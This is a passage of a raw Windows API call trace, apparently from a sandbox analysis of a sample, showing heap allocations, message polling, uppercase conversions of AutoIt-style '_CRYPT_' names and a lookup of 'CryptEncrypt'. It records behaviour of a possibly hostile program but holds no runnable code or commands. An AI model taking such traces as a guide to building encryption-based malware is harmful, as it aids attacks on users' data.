[0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0166.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0166.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0166.908] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0166.908] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0166.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0166.908] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0166.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0166.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0166.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0166.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0166.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0166.909] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0166.909] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0166.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0166.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0166.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0166.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0166.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0166.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0166.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0166.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0166.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0166.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0166.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0166.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0166.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0166.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0166.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0166.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0166.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0166.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4113020 [0167.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x4113020 | out: hHeap=0x970000) returned 1 [0167.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0167.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0167.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0167.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0167.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0167.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0167.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0167.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0167.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0167.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0167.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0167.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0167.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0167.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0167.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0167.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0167.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0167.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0167.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0167.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0167.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0167.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0167.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0167.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 